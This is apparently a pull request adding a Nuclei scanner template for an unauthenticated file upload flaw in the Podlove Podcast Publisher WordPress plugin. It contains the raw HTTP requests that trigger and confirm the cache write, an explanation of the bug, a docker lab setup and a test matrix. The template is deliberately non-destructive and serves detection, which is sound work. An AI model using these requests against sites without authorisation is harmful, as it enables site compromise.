### PR TITLE
Added CVE-2026-13001 - Podlove Podcast Publisher <= 4.5.1 Arbitrary File Upload

### DIFF
--- a/http/cves/2026/CVE-2026-13001.yaml
+++ b/http/cves/2026/CVE-2026-13001.yaml
@@ -1,0 +1,63 @@
+id: CVE-2026-13001
+
+info:
+  name: Podlove Podcast Publisher <= 4.5.1 - Unauthenticated Arbitrary File Upload
+  author: aryu-ru
+  severity: critical
+  description: |
+    Podlove Podcast Publisher plugin for WordPress through 4.5.1 is vulnerable to arbitrary file uploads due to missing file type validation in the podlove_handle_cache_files function. The image cache derives the stored file extension from the path of the attacker supplied source URL, while the image validation is performed against a different file name taken from the full source URL, so a source URL whose path carries a dangerous extension is written to the cache with that extension.
+  impact: |
+    An unauthenticated attacker can write files with an arbitrary extension into the web accessible cache directory, which may make remote code execution and full site compromise possible.
+  remediation: |
+    Update Podlove Podcast Publisher to version 4.5.2 or later.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-13001
+    - https://github.com/podlove/podlove-publisher/commit/5b32468601e903bae2bcacfaf36ff583d2bc9387
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/f81a3429-f378-4295-adbe-ad6f1df59701?source=cve
+    - https://github.com/advisories/GHSA-7gcx-p8g5-3g9x
+    - https://plugins.trac.wordpress.org/changeset/3597461/podlove-podcasting-plugin-for-wordpress
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-13001
+    cwe-id: CWE-20
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: podlove
+    product: podlove-podcasting-plugin-for-wordpress
+    framework: wordpress
+    shodan-query: http.component:"wordpress"
+    fofa-query: body="podlove-podcasting-plugin-for-wordpress"
+  tags: cve,cve2026,wordpress,wp,wp-plugin,podlove,file-upload,unauth,intrusive
+
+variables:
+  # randstr keeps the same value across both requests, and the plugin runs the
+  # file name through sanitize_title(), so it has to be lower cased to stay in
+  # sync with the cache path that the target derives from it.
+  rnd: "{{randstr}}"
+  marker: "{{to_lower(rnd)}}"
+  source: "{{RootURL}}/{{marker}}.txt?/wp-content/plugins/podlove-podcasting-plugin-for-wordpress/images/logo/podlove-publisher-icon-500.png"
+  cid: "{{md5(concat(source,marker))}}"
+
+http:
+  # The source URL points at the plugin's own bundled icon, so the cache is populated
+  # from the local copy and no outbound request leaves the target. The URL path carries
+  # the .txt extension that the vulnerable build reuses for the cached file.
+  - raw:
+      - |
+        GET /?podlove_image_cache_url={{hex_encode(source)}}&podlove_width=100&podlove_height=100&podlove_crop=0&podlove_file_name={{marker}} HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /wp-content/cache/podlove/{{substr(cid,0,2)}}/{{substr(cid,2)}}/{{marker}}_original.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_2 == 200'
+          - 'contains(header_2, "text/plain")'
+          - 'contains(hex_encode(body_2), "89504e470d0a1a0a")'
+        condition: and

--- a/http/cves/2026/CVE-2026-13001.yaml
+++ b/http/cves/2026/CVE-2026-13001.yaml
@@ -1,7 +1,7 @@
 id: CVE-2026-13001
 
 info:
-  name: Podlove Podcast Publisher <= 4.5.1 - Unauthenticated Arbitrary File Upload
+  name: Podlove Podcast Publisher <= 4.5.1 - Arbitrary File Upload
   author: aryu-ru
   severity: critical
   description: |
@@ -11,11 +11,11 @@ info:
   remediation: |
     Update Podlove Podcast Publisher to version 4.5.2 or later.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2026-13001
     - https://github.com/podlove/podlove-publisher/commit/5b32468601e903bae2bcacfaf36ff583d2bc9387
     - https://www.wordfence.com/threat-intel/vulnerabilities/id/f81a3429-f378-4295-adbe-ad6f1df59701?source=cve
     - https://github.com/advisories/GHSA-7gcx-p8g5-3g9x
     - https://plugins.trac.wordpress.org/changeset/3597461/podlove-podcasting-plugin-for-wordpress
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-13001
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -27,23 +27,17 @@ info:
     vendor: podlove
     product: podlove-podcasting-plugin-for-wordpress
     framework: wordpress
-    shodan-query: http.component:"wordpress"
-    fofa-query: body="podlove-podcasting-plugin-for-wordpress"
-  tags: cve,cve2026,wordpress,wp,wp-plugin,podlove,file-upload,unauth,intrusive
+    shodan-query: http.html:"/wp-content/plugins/podlove-podcasting-plugin-for-wordpress"
+    fofa-query: body="/wp-content/plugins/podlove-podcasting-plugin-for-wordpress"
+  tags: cve,cve2026,wordpress,wp,wp-plugin,podlove,file-upload,intrusive
 
 variables:
-  # randstr keeps the same value across both requests, and the plugin runs the
-  # file name through sanitize_title(), so it has to be lower cased to stay in
-  # sync with the cache path that the target derives from it.
   rnd: "{{randstr}}"
   marker: "{{to_lower(rnd)}}"
   source: "{{RootURL}}/{{marker}}.txt?/wp-content/plugins/podlove-podcasting-plugin-for-wordpress/images/logo/podlove-publisher-icon-500.png"
   cid: "{{md5(concat(source,marker))}}"
 
 http:
-  # The source URL points at the plugin's own bundled icon, so the cache is populated
-  # from the local copy and no outbound request leaves the target. The URL path carries
-  # the .txt extension that the vulnerable build reuses for the cached file.
   - raw:
       - |
         GET /?podlove_image_cache_url={{hex_encode(source)}}&podlove_width=100&podlove_height=100&podlove_crop=0&podlove_file_name={{marker}} HTTP/1.1
@@ -53,11 +47,10 @@ http:
         GET /wp-content/cache/podlove/{{substr(cid,0,2)}}/{{substr(cid,2)}}/{{marker}}_original.txt HTTP/1.1
         Host: {{Hostname}}
 
-    req-condition: true
     matchers:
       - type: dsl
         dsl:
-          - 'status_code_2 == 200'
-          - 'contains(header_2, "text/plain")'
           - 'contains(hex_encode(body_2), "89504e470d0a1a0a")'
+          - 'contains(header_2, "text/plain")'
+          - 'status_code_2 == 200'
         condition: and


### PR DESCRIPTION
### PR Information

- Added CVE-2026-13001 — Podlove Podcast Publisher <= 4.5.1 - Unauthenticated Arbitrary File Upload
- References:
  - https://nvd.nist.gov/vuln/detail/CVE-2026-13001
  - https://github.com/podlove/podlove-publisher/commit/5b32468601e903bae2bcacfaf36ff583d2bc9387
  - https://www.wordfence.com/threat-intel/vulnerabilities/id/f81a3429-f378-4295-adbe-ad6f1df59701?source=cve
  - https://github.com/advisories/GHSA-7gcx-p8g5-3g9x
  - https://plugins.trac.wordpress.org/changeset/3597461/podlove-podcasting-plugin-for-wordpress

The image cache in `podlove_handle_cache_files` derives the stored file extension from the **path** of the attacker supplied source URL (`extract_file_extension()` → `pathinfo(wp_parse_url($url)['path'], PATHINFO_EXTENSION)`), while the image content validation runs against a **different** name taken from the full source URL (`is_image($file, basename($this->source_url))`). A source URL such as `…/<name>.txt?/…/podlove-publisher-icon-500.png` therefore validates as a PNG but is written to the cache as `<name>_original.txt`. No authentication is required.

The template proves the write rather than fingerprinting a version:

1. `GET /?podlove_image_cache_url=<hex>&podlove_width=100&podlove_height=100&podlove_crop=0&podlove_file_name={{marker}}` triggers the cache write.
2. `GET /wp-content/cache/podlove/{{substr(cid,0,2)}}/{{substr(cid,2)}}/{{marker}}_original.txt` reads the written file back, where `cid = md5(source_url + marker)` — the same derivation the plugin uses (`$id = md5($url . $this->file_name)`, split as `substr($id,0,2)/substr($id,2)`).

Match requires all three: `status_code_2 == 200`, `Content-Type: text/plain`, and PNG magic `89504e470d0a1a0a` in the body. The **content/extension mismatch is itself the vulnerability signature** — a `text/plain` response whose body is a PNG.

Two deliberate safety choices:

- The source URL points at the plugin's **own bundled icon** (`images/logo/podlove-publisher-icon-500.png`), so the `$current_domain == $source_domain` branch copies from local disk and **no outbound request leaves the target**. Nothing is fetched from the internet and no callback is needed.
- The extension used is `.txt`, not the PoC's `.php`. Detection is identical, and nothing executable is written. The file name uses `{{randstr}}` so no existing file can be overwritten. Tagged `intrusive` since a file is still created.

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details

**Setup (fully self-contained, no external target):**

```bash
docker network create pd-net
docker run -d --name pd-db --network pd-net \
  -e MARIADB_ROOT_PASSWORD=root -e MARIADB_DATABASE=wp \
  -e MARIADB_USER=wp -e MARIADB_PASSWORD=wp mariadb:10.11
docker run -d --name pd-wp --network pd-net -p 18201:80 \
  -e WORDPRESS_DB_HOST=pd-db -e WORDPRESS_DB_USER=wp \
  -e WORDPRESS_DB_PASSWORD=wp -e WORDPRESS_DB_NAME=wp wordpress:php8.2-apache

docker run --rm --network pd-net --volumes-from pd-wp -u 33:33 \
  -e WORDPRESS_DB_HOST=pd-db -e WORDPRESS_DB_USER=wp \
  -e WORDPRESS_DB_PASSWORD=wp -e WORDPRESS_DB_NAME=wp \
  wordpress:cli wp core install --url=http://127.0.0.1:18201 --title=lab \
  --admin_user=admin --admin_password='Adm!nPass123' --admin_email=a@b.local \
  --skip-email --path=/var/www/html

# vulnerable: 4.5.1   |   patched negative test: swap for the 4.5.2 zip
curl -sLo pl.zip https://downloads.wordpress.org/plugin/podlove-podcasting-plugin-for-wordpress.4.5.1.zip
unzip -qo pl.zip && docker cp podlove-podcasting-plugin-for-wordpress \
  pd-wp:/var/www/html/wp-content/plugins/
docker exec pd-wp chown -R www-data:www-data \
  /var/www/html/wp-content/plugins/podlove-podcasting-plugin-for-wordpress
docker exec pd-wp sh -c 'mkdir -p /var/www/html/wp-content/cache && chown -R www-data:www-data /var/www/html/wp-content/cache'
docker run --rm --network pd-net --volumes-from pd-wp -u 33:33 \
  -e WORDPRESS_DB_HOST=pd-db -e WORDPRESS_DB_USER=wp \
  -e WORDPRESS_DB_PASSWORD=wp -e WORDPRESS_DB_NAME=wp \
  wordpress:cli wp plugin activate podlove-podcasting-plugin-for-wordpress --path=/var/www/html
```

Default (plain) permalinks are sufficient — the handler is registered on the `wp` action and reads public query vars.

**Vulnerable — Podlove 4.5.1 (matches):**

```
GET /wp-content/cache/podlove/33/b5fcc2e3cc86d33012fc720dde5734/3hpjmub9kuyswuvwtuo4o9e7hgf_original.txt HTTP/1.1
Host: 127.0.0.1:18201

HTTP/1.1 200 OK
Content-Type: text/plain
Server: Apache/2.4.67 (Debian)

[CVE-2026-13001] [http] [critical] http://127.0.0.1:18201/wp-content/cache/podlove/33/b5fcc2e3cc86d33012fc720dde5734/3hpjmub9kuyswuvwtuo4o9e7hgf_original.txt
```

**Patched — Podlove 4.5.2 (no match):**

```
GET /wp-content/cache/podlove/1a/01990898033b8f39f0bcdd03b9c6a0/3hpjmzoxnck7gwmcxrv0coqw3nf_original.txt HTTP/1.1
Host: 127.0.0.1:18202

HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Content-Length: 0
```

Importantly, the patched instance **did** process the request — it created the cache entry with the safe extension the fix enforces, so the negative result is the patch working, not the template failing to run:

```
# patched 4.5.2, after the template run
/wp-content/cache/podlove/87/366252eee3b3aab2ca60911847bfd3/3hpiqxwnodchmasle52tsxwoj4b_original.png   <-- .png
# vulnerable 4.5.1, after the template run
/wp-content/cache/podlove/33/b5fcc2e3cc86d33012fc720dde5734/3hpjmub9kuyswuvwtuo4o9e7hgf_original.txt   <-- .txt
```

**Full test matrix:**

| Target | Expected | Result |
|---|---|---|
| Podlove 4.5.1 (vulnerable) | match | ✅ match |
| Podlove 4.5.1, second run (idempotence) | match | ✅ match |
| Podlove 4.5.2 (patched) | no match | ✅ no match |
| WordPress with plugin absent | no match | ✅ no match |
| Catch-all host returning `200` + PNG body for every path | no match | ✅ no match |
| `http://honey.scanme.sh` | no match | ✅ no match |

The catch-all case is included specifically because a matcher keyed only on `200` + PNG magic would false-positive there; requiring `Content-Type: text/plain` alongside PNG content is what excludes it. Neither matcher string appears anywhere in the request, so an echo host has nothing to reflect.

`nuclei -validate`, `yamllint -c .yamllint`, and the honeypot check all pass locally.

**Reviewer notes:**

- Known false negative (fails closed): behind a reverse proxy that rewrites `Host`, `$current_domain == $source_domain` is false, the local-copy fast path is skipped, and the fallback HTTP fetch of the `.txt` path returns a WordPress 404 rather than an image — so nothing is written and the template does not match. It never produces a false positive in that case.
- No CPE configuration is published for this CVE (NVD `vulnStatus: Deferred`), so `vendor`/`product` use the WordPress.org plugin slug, consistent with other `wp-plugin` templates in the repo.
- CVSS 9.8 and CWE-20 are taken from the NVD record (Wordfence, Secondary — there is no Primary metric). CWE-20 rather than CWE-434 is what both NVD and the GHSA assign.
- No researcher credit is published in the advisory, GHSA (`credits: []`), or the vendor commit, so no discoverer is listed in `author`. Happy to add one if a maintainer knows the correct attribution.
- Related: issue #13863 proposes a Podlove upload template, but it targets a different CVE (CVE-2025-7443) and the older 4.2.6 fix, and its matcher is `matchers-condition: or` over a bare `status: 200`. This template is a different vulnerability and does not supersede it; happy to follow up on that issue separately if useful.
